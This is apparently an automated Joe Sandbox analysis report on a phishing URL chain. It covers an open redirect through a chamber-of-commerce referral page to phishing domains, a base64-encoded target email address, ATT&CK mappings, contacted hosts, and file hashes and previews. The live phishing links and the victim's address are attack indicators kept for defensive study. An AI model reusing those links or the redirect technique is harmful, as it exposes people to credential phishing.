    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    3
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    lehighvalleypacoc.weblinkconnect.com0%VirustotalBrowse
    web.lehighvalleychamber.org0%VirustotalBrowse
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    ipapi.co
    104.26.8.44
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        code.jquery.com
        151.101.66.137
        truefalse
          high
          d2vgu95hoyrpkh.cloudfront.net
          108.156.152.88
          truefalse
            high
            lehighvalleypacoc.weblinkconnect.com
            104.18.248.141
            truefalseunknown
            efe.q39r.com
            172.67.218.12
            truefalse
              unknown
              challenges.cloudflare.com
              104.17.3.184
              truefalse
                high
                www.google.com
                64.233.177.103
                truefalse
                  high
                  sanemedia.ca
                  162.241.120.242
                  truefalse
                    unknown
                    httpbin.org
                    174.129.50.9
                    truefalse
                      high
                      web.lehighvalleychamber.org
                      unknown
                      unknownfalseunknown
                      cdn.socket.io
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYfalse
                          unknown
                          https://efe.q39r.com/efe/#Xzzfdoml_supervisor1st_assistant@fd.orgtrue
                            unknown
                            https://sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=false
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50elk/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                104.26.8.44
                                ipapi.coUnited States
                                13335CLOUDFLARENETUSfalse
                                108.156.152.88
                                d2vgu95hoyrpkh.cloudfront.netUnited States
                                16509AMAZON-02USfalse
                                64.233.177.95
                                unknownUnited States
                                15169GOOGLEUSfalse
                                1.1.1.1
                                unknownAustralia
                                13335CLOUDFLARENETUSfalse
                                142.250.105.94
                                unknownUnited States
                                15169GOOGLEUSfalse
                                142.250.105.84
                                unknownUnited States
                                15169GOOGLEUSfalse
                                104.18.248.141
                                lehighvalleypacoc.weblinkconnect.comUnited States
                                13335CLOUDFLARENETUSfalse
                                172.217.215.105
                                unknownUnited States
                                15169GOOGLEUSfalse
                                172.67.218.12
                                efe.q39r.comUnited States
                                13335CLOUDFLARENETUSfalse
                                174.129.50.9
                                httpbin.orgUnited States
                                14618AMAZON-AESUSfalse
                                172.253.124.138
                                unknownUnited States
                                15169GOOGLEUSfalse
                                142.250.105.138
                                unknownUnited States
                                15169GOOGLEUSfalse
                                172.253.124.94
                                unknownUnited States
                                15169GOOGLEUSfalse
                                23.23.165.157
                                unknownUnited States
                                14618AMAZON-AESUSfalse
                                173.194.219.94
                                unknownUnited States
                                15169GOOGLEUSfalse
                                104.17.3.184
                                challenges.cloudflare.comUnited States
                                13335CLOUDFLARENETUSfalse
                                239.255.255.250
                                unknownReserved
                                unknownunknownfalse
                                64.233.177.103
                                www.google.comUnited States
                                15169GOOGLEUSfalse
                                151.101.66.137
                                code.jquery.comUnited States
                                54113FASTLYUSfalse
                                35.190.80.1
                                a.nel.cloudflare.comUnited States
                                15169GOOGLEUSfalse
                                162.241.120.242
                                sanemedia.caUnited States
                                46606UNIFIEDLAYER-AS-1USfalse
                                104.17.2.184
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                104.21.17.5
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                IP
                                192.168.2.16
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1431646
                                Start date and time:2024-04-25 15:02:09 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                Sample URL:https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:14
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • EGA enabled
                                Analysis Mode:stream
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal52.phis.win@18/39@34/225
                                • Exclude process from analysis (whitelisted): svchost.exe
                                • Excluded IPs from analysis (whitelisted): 142.250.105.94, 172.253.124.138, 172.253.124.101, 172.253.124.100, 172.253.124.113, 172.253.124.102, 172.253.124.139, 142.250.105.84, 34.104.35.123
                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                • Not all processes where analyzed, report is missing behavior information
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:02:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2673
                                Entropy (8bit):3.9892670350514736
                                Encrypted:false
                                SSDEEP:
                                MD5:32FA55CA6F219F92B62F358FD4E1E6A3
                                SHA1:720667793F4D7DA9EBA21893D6A207C1C76356E4
                                SHA-256:9D778A707AF93EC798E4707E7DA7F7EBBE053431D9887F27B6A44E2EDDCB6EE6
                                SHA-512:85D1E563CCADC8FE02E848C2913AB1E18F6F5E305FE09946E06E1DC33AE98E2C09DF3AF643AFF4432F3E5CA6863CF0E9275ED1B16981F375E94E89C67CAA67FE
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,....s.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIh....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XQh....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XQh....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XQh..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XRh...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:02:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2675
                                Entropy (8bit):4.006003504017763
                                Encrypted:false
                                SSDEEP:
                                MD5:3E9E361C5F82E4E8AE12805724BA4BCA
                                SHA1:533C640A183A5AC5051ED13AAE989EC103D00CD4
                                SHA-256:4BE091B5F308CF476CBAF1F23C3E5606C65E5FB8FCD608F92AD1A7D87B0763D6
                                SHA-512:C125681251646F3B5519051A4F1B35C256C760B1336DD6FC0F034AC3CF0AB0376E0EC7F4EDF0DC91015866FCB951DEEB516C1C22749746314952FB8774FEB443
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,..........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIh....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XQh....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XQh....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XQh..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XRh...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2689
                                Entropy (8bit):4.00935030291619
                                Encrypted:false
                                SSDEEP:
                                MD5:EA3B0FAEC580A5ED2614242745A7CC5D
                                SHA1:792CF3AAE9A56FAB6C1662686CCAA18E8234FF6F
                                SHA-256:CD13F8178E683AB0F31F9C59E9D7BC95E12B99E2682652269CA6D135466215BF
                                SHA-512:CA57708AE850B5CBEAD5DE3AFD033AF61DB2AD7DC18982DF6ACD97CEDC4266B2E9868217F63C8E7594DDBC3BF60219292C6200C8A14C86FB0D98BA6B1C423E5F
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIh....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XQh....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XQh....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XQh..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:02:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2677
                                Entropy (8bit):3.999186160990326
                                Encrypted:false
                                SSDEEP:
                                MD5:C5AEE9257B279B23AB8CB9C59C236487
                                SHA1:9C9262DB7D560C09F25AACCADBB835E0904EF9AF
                                SHA-256:54F87821ADE2BB10C54BD98500727DEFCF80CBAAA6D01AC49A926F8D3AEB27F6
                                SHA-512:EF46424DF241B2DB1DC4B654E1BCC13AF87B41E84C2171519D295B5F71DD1FEC0A09EC3755EBA51E454EE5D742D1E4D72B411D454468F0FEEA7A1ABA2D6844C6
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....A......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIh....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XQh....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XQh....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XQh..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XRh...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:02:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2677
                                Entropy (8bit):3.992353088290928
                                Encrypted:false
                                SSDEEP:
                                MD5:1F895835AC8972C6B9E47BE33D8073CB
                                SHA1:631B93CBD0B0D5A9440D2BD3618AE72830740EA5
                                SHA-256:3AF47B2F3A2D32FED9935A73B3B1A9FD2BCB20B52755F953D235382030EA27C2
                                SHA-512:C4F44B85AD53C67C8432B97C7A3059AB34250572B6C083FDF299E5776770E61CFC4DE8E93C54797DBC4E8DAA3189D0EF1BD154C1CCA99F3201624C2813733525
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....>......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIh....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XQh....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XQh....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XQh..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XRh...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:02:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2679
                                Entropy (8bit):4.001864495637742
                                Encrypted:false
                                SSDEEP:
                                MD5:DEB99DB5FC7F3733AAC3978ECE55BE4D
                                SHA1:5B2D388EA7CD5EF4C3E4AB64E94E21AF638AC60D
                                SHA-256:83A90121980479C7074691D9705EDD7E46CFAF91737B0C5349413FBB8938D3F4
                                SHA-512:8ABFE7A91FB9AFE8139DAFEBA01AB67219234020F718A04E184156687958E4BCE9DDB45A9DA18ED334C5770B28C9DC5F4CA2ED63B40CF74D1FFEC42C50E8D99F
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....@......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIh....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XQh....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XQh....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XQh..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XRh...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 99 x 82, 8-bit/color RGB, non-interlaced
                                Category:downloaded
                                Size (bytes):61
                                Entropy (8bit):4.035372245524405
                                Encrypted:false
                                SSDEEP:
                                MD5:FF4634097F6A44E64BB7C64B9169A05F
                                SHA1:7C210E9FEDA41CE3D591E6F383B6F6593FCF2B1D
                                SHA-256:B507580DAE3DF6F54CFFB3F9B8298A100D28B57C250DFB44C9A11EFBFF41A1D4
                                SHA-512:80E3113D48CC4CA5353B3E25E48371C071C8960A26ED99AC65A1BCF70CC5D7AC5372A35F45F35364409DDCB3B3506702BDE822815D58A906E17494703DB53181
                                Malicious:false
                                Reputation:unknown
                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/879e87513985ad68/1714050159793/UiALUvT7BbtkOkY
                                Preview:.PNG........IHDR...c...R.............IDAT.....$.....IEND.B`.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                Category:downloaded
                                Size (bytes):28000
                                Entropy (8bit):7.99335735457429
                                Encrypted:true
                                SSDEEP:
                                MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/pqeHrb7VYo7vyzXDwx36
                                Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:SVG Scalable Vector Graphics image
                                Category:dropped
                                Size (bytes):2905
                                Entropy (8bit):3.962263100945339
                                Encrypted:false
                                SSDEEP:
                                MD5:FE87496CC7A44412F7893A72099C120A
                                SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                Malicious:false
                                Reputation:unknown
                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 4096 x 4096, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):259183
                                Entropy (8bit):7.172405308346001
                                Encrypted:false
                                SSDEEP:
                                MD5:DFD243DB9FCFDB629957D9E17C7C314F
                                SHA1:19A56EC6D5F5360BF8A044BEEC85F9C69B2A3417
                                SHA-256:E205239979E7FBCEBE800D1F9CE1139A2EEC9EF49781DD0C90B7811E3E963D12
                                SHA-512:E4EFE442BE74B5118801EB3B2E1D803858031A333ABF8BF5776D856DE95C0437B59E259032F91BA950329C49ED5EE4BEE4CF7FDAF02D7923A2985FD8D0652865
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR..............$.....pHYs............... .IDATx...{.].].p..R..M.xwfm+...T.I.....!hd!.........Q..A..Nh.*.P(....VPY...@"RM.y.;s..")i.}D..V%.qj_.][U..Il.z........{....=.a.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):49602
                                Entropy (8bit):7.881935507115631
                                Encrypted:false
                                SSDEEP:
                                MD5:DB783743CD246FF4D77F4A3694285989
                                SHA1:B9466716904457641B7831868B47162D8D378D41
                                SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:SVG Scalable Vector Graphics image
                                Category:dropped
                                Size (bytes):268
                                Entropy (8bit):5.111190711619041
                                Encrypted:false
                                SSDEEP:
                                MD5:59759B80E24A89C8CD029B14700E646D
                                SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                Malicious:false
                                Reputation:unknown
                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                Category:downloaded
                                Size (bytes):109964
                                Entropy (8bit):5.201196778775329
                                Encrypted:false
                                SSDEEP:
                                MD5:78A5500114640D663460BCBB33E694EB
                                SHA1:C72B1B93C8BC2DDBD77BA3C042A8ED415B6B8E26
                                SHA-256:E97FE9DB7CA567DA1F9F5A3B87B669146ADDF1983392C32FDA68C4D667A3CA22
